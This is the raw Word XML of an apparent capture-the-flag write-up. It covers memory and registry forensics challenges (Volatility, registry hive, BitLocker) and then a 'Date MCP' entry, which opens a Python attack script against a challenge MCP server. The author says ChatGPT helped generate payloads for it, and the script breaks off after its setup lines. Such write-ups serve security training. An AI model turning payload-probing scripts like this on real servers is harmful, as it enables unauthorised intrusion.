            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="104984379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3797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2B22" w14:textId="2DE6DB2D" w:rsidR="00B32B09" w:rsidRDefault="002D099B" w:rsidP="002E1E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Then converted the file to symbols using </w:t>
      </w:r>
      <w:r w:rsidRPr="002D099B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dwarf2json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and added it in the volatility folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED5990" w14:textId="77777777" w:rsidR="002D099B" w:rsidRPr="00490371" w:rsidRDefault="002D099B" w:rsidP="002E1E37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62146BAA" w14:textId="74F602F8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6" w:name="_Toc203244054"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Volatile Expert Pt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6C3101E2" w14:textId="333EF517" w:rsidR="00B32B09" w:rsidRDefault="002D099B" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D099B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114D5451" wp14:editId="390BEAB1">
            <wp:extent cx="5274310" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="10709489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4894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9F07" w14:textId="77777777" w:rsidR="002D099B" w:rsidRPr="00B32B09" w:rsidRDefault="002D099B" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB8D10C" w14:textId="5E5D9820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7" w:name="_Toc203244055"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Volatile Expert Pt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="770D8DA1" w14:textId="24E125A2" w:rsidR="00B32B09" w:rsidRDefault="00B32B09" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B32B09">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C6D7DAF" wp14:editId="2F950C9E">
            <wp:extent cx="5274310" cy="1125855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="174632498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4982" name="Picture 1" descr="A computer code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604E" w14:textId="77777777" w:rsidR="00B32B09" w:rsidRPr="00B32B09" w:rsidRDefault="00B32B09" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F37106" w14:textId="2C79D933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8" w:name="_Toc203244056"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Volatile Expert Pt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7DFDB30A" w14:textId="7C74CDAD" w:rsidR="0069368D" w:rsidRPr="0069368D" w:rsidRDefault="0069368D" w:rsidP="0069368D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52886">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inside the volshell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C50835" w14:textId="2843EF90" w:rsidR="00B32B09" w:rsidRDefault="00E3169D" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3169D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="514A1D56" wp14:editId="6A141F01">
            <wp:extent cx="5274310" cy="1846580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="68513163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1636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18A9" w14:textId="77777777" w:rsidR="00544317" w:rsidRPr="00B32B09" w:rsidRDefault="00544317" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC77A9E" w14:textId="41890CB2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9" w:name="_Toc203244057"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Volatile Expert Pt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="70C11915" w14:textId="72341B05" w:rsidR="00A52886" w:rsidRPr="00A52886" w:rsidRDefault="00A52886" w:rsidP="00A52886">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52886">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inside the volshell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474558B0" w14:textId="538D4F8D" w:rsidR="00544317" w:rsidRPr="00544317" w:rsidRDefault="00A52886" w:rsidP="00544317">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52886">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F31BB3F" wp14:editId="3EEFD1BB">
            <wp:extent cx="5274310" cy="1296670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="120831001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10014" name="Picture 1" descr="A computer code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D031" w14:textId="578211CE" w:rsidR="00544317" w:rsidRPr="00544317" w:rsidRDefault="00544317" w:rsidP="00544317">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544317">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Asked ChatGPT to reverse my findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCBE35F" w14:textId="6D2E4647" w:rsidR="00B32B09" w:rsidRDefault="00544317" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544317">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234B088E" wp14:editId="5E71A997">
            <wp:extent cx="5274310" cy="1849755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6924729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2967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937" w14:textId="77777777" w:rsidR="00A52886" w:rsidRPr="00B32B09" w:rsidRDefault="00A52886" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FFD74C" w14:textId="6BB3ED98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0" w:name="_Toc203244058"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Volatile Expert Pt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="1A3FA1C4" w14:textId="6DC04F10" w:rsidR="007D77C4" w:rsidRPr="007D77C4" w:rsidRDefault="007D77C4" w:rsidP="007D77C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D77C4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inside the volshell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF35DB" w14:textId="5C63451D" w:rsidR="00B07505" w:rsidRPr="00B07505" w:rsidRDefault="007D77C4" w:rsidP="00B07505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D77C4"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675F604B" wp14:editId="4108583E">
            <wp:extent cx="5274310" cy="2072005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="2184554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5492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EE2" w14:textId="77777777" w:rsidR="00B32B09" w:rsidRPr="00B32B09" w:rsidRDefault="00B32B09" w:rsidP="00B32B09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760C8AA3" w14:textId="5256689B" w:rsidR="0018145A" w:rsidRDefault="00A513EE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1" w:name="_Toc203244059"/>
      <w:r w:rsidRPr="00086989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hive Heist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="05A88B5D" w14:textId="069E18DB" w:rsidR="0069590F" w:rsidRPr="00F87358" w:rsidRDefault="00F87358" w:rsidP="0069590F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F87358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Just opened the file in Notepad and searched the text in the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6A3D9" w14:textId="77777777" w:rsidR="0069590F" w:rsidRPr="0069590F" w:rsidRDefault="0069590F" w:rsidP="0069590F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297FB9ED" w14:textId="77777777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2" w:name="_Toc203244060"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HexCell Hunt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="180E0DD1" w14:textId="2CCBC6CF" w:rsidR="00361DEA" w:rsidRDefault="00361DEA" w:rsidP="00361DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00361DEA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Opened the SYSTEM file using Registry Explorer and noticed Skew1. Then opened the file again on a hex editor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00361DEA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>searched for “Skew1”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and found it here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0DCDF" w14:textId="28C1CD2B" w:rsidR="00361DEA" w:rsidRDefault="00361DEA" w:rsidP="00361DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00361DEA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DE8C224" wp14:editId="07F26427">
            <wp:extent cx="5274310" cy="512445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="14595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474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C477" w14:textId="6EAA9C40" w:rsidR="00361DEA" w:rsidRDefault="00361DEA" w:rsidP="00361DE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Then gave this hex part to ChatGPT and it calculated and gave back the flag:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00361DEA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22394255" wp14:editId="4F459C42">
            <wp:extent cx="5274310" cy="991870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="125416748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6748" name="Picture 1" descr="A black rectangle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8E1B" w14:textId="77777777" w:rsidR="002E1E37" w:rsidRPr="00A513EE" w:rsidRDefault="002E1E37" w:rsidP="00361DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694762BC" w14:textId="7D4ECC6A" w:rsidR="0018145A" w:rsidRDefault="00A513EE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3" w:name="_Toc203244061"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cursed Locker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="41692A1A" w14:textId="77CE0DC7" w:rsidR="003208DB" w:rsidRPr="005B7359" w:rsidRDefault="003208DB" w:rsidP="003208DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This challenge was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bitlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2” of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PicoCTF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2025”, so I got my writeup for that and changed it a bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B64BFC" w14:textId="2C9E0861" w:rsidR="003208DB" w:rsidRDefault="003208DB" w:rsidP="003208DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003208DB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B44C93" wp14:editId="0671A04B">
            <wp:extent cx="5274310" cy="966470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1437530492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30492" name="Picture 1" descr="A black rectangular object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CFF5" w14:textId="7A25F9E3" w:rsidR="003208DB" w:rsidRDefault="003208DB" w:rsidP="003208DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003208DB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF0819D" wp14:editId="33FEAD3A">
            <wp:extent cx="5274310" cy="1198245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1924363593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63593" name="Picture 1" descr="A computer screen shot of a computer erro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AEDA" w14:textId="69348B88" w:rsidR="003208DB" w:rsidRDefault="004C0618" w:rsidP="003208DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0618">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD9DA64" wp14:editId="208B3519">
            <wp:extent cx="5274310" cy="1102995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="11575326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32652" name="Picture 1" descr="A black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AD96" w14:textId="283B2930" w:rsidR="004C0618" w:rsidRDefault="004C0618" w:rsidP="003208DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0618">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A7CF89" wp14:editId="5EA022D0">
            <wp:extent cx="5274310" cy="1069340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="545036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36314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545E" w14:textId="168D3D60" w:rsidR="004C0618" w:rsidRDefault="004C0618" w:rsidP="003208DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0618">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="437840A0" wp14:editId="4BA77F9A">
            <wp:extent cx="5274310" cy="941705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4535175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7506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A06D" w14:textId="101C4811" w:rsidR="004C0618" w:rsidRPr="005B7359" w:rsidRDefault="005B7359" w:rsidP="003208DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Searched in the strings of the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dislocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B7359">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-file” and got the flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6E61A" w14:textId="77777777" w:rsidR="00BF377F" w:rsidRDefault="00BF377F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4537F8A1" w14:textId="7F534765" w:rsidR="0018145A" w:rsidRDefault="00C05876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14" w:name="_Toc203244062"/>
      <w:r w:rsidRPr="00C05876">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Misc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6E052565" w14:textId="77777777" w:rsidR="0065392B" w:rsidRPr="0065392B" w:rsidRDefault="0065392B" w:rsidP="0065392B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4A115B" w14:textId="4927CC2C" w:rsidR="0018145A" w:rsidRDefault="00A513EE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5" w:name="_Toc203244063"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CalculAItor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="333EF887" w14:textId="2A72B2E8" w:rsidR="0065392B" w:rsidRDefault="0065392B" w:rsidP="0065392B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065392B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D46250F" wp14:editId="4D832D7D">
            <wp:extent cx="5274310" cy="334645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="199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8EF" w14:textId="77777777" w:rsidR="0065392B" w:rsidRPr="0065392B" w:rsidRDefault="0065392B" w:rsidP="0065392B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278893DF" w14:textId="3A58E134" w:rsidR="0018145A" w:rsidRDefault="00A513EE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6" w:name="_Toc203244064"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date MCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="63C9111A" w14:textId="77777777" w:rsidR="0054022A" w:rsidRPr="0054022A" w:rsidRDefault="0054022A" w:rsidP="0054022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054022A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With the help of ChatGPT I created a script and tried payloads, until the one worked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53161C7F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1.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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12501373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2.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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506D80E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3.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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="129B4A2F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4.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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A79B048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5.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sseclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSEClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="596CB7B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6.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AD1919F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7.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1) Start SSE and grab </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14CC50F0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8.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session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requests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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Session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7D49C84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 9.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sse_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"http://challenge.hackthat.site:43130/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sse</w:t>
      </w:r>
